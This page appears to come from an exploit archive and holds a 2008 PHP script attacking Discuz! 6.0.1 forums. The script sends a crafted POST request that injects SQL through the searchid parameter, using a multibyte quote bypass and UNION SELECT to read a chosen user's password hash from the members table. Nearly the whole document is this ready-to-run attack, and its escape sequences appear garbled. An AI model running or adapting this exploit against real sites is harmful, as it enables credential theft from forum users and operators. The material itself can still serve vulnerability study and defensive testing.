Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
# Published : 2008-08-06
# Author : james
# Previous Title : Free Hosting Manager 1.2/2.0 Insecure Cookie Handling Vulnerability
# Next Title : Plogger <= 3.0 Remote SQL Injection Vulnerability

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
+------------------------------------------------------------------+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY  james
+------------------------------------------------------------------+
");

if($argc>4)
{
 $host=$argv[1];
 $port=$argv[2];
 $path=$argv[3];
 $uid=$argv[4];
}else{
 echo "Usage: php ".$argv[0]." host port path uidn";
 echo "host:      target server n";
 echo "port:      the web port, usually 80n";
 echo "path:      path to discuzn";
 echo "uid :      user ID you wanna getn";
 echo "Example:rn";
 echo "php ".$argv[0]." localhost 80 1n";
 exit;
}

$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";

$data = "POST /".$path."/index.php"." HTTP/1.1rn";
$data .= "Accept: */*rn";
$data .= "Accept-Language: zh-cnrn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "User-Agent: waprn";
$data .= "Host: ".$host."rn";
$data .= "Content-length: ".strlen($content)."rn";
$data .= "Connection: Closern";
$data .= "rn";
$data .= $content."rnrn";
$ock=fsockopen($host,$port);
if (!$ock) {
 echo 'No response from '.$host;
 die;
}
fwrite($ock,$data);
while (!feof($ock)) {
   echo fgets($ock, 1024);
}
?>

# www.Syue.com [2008-08-06]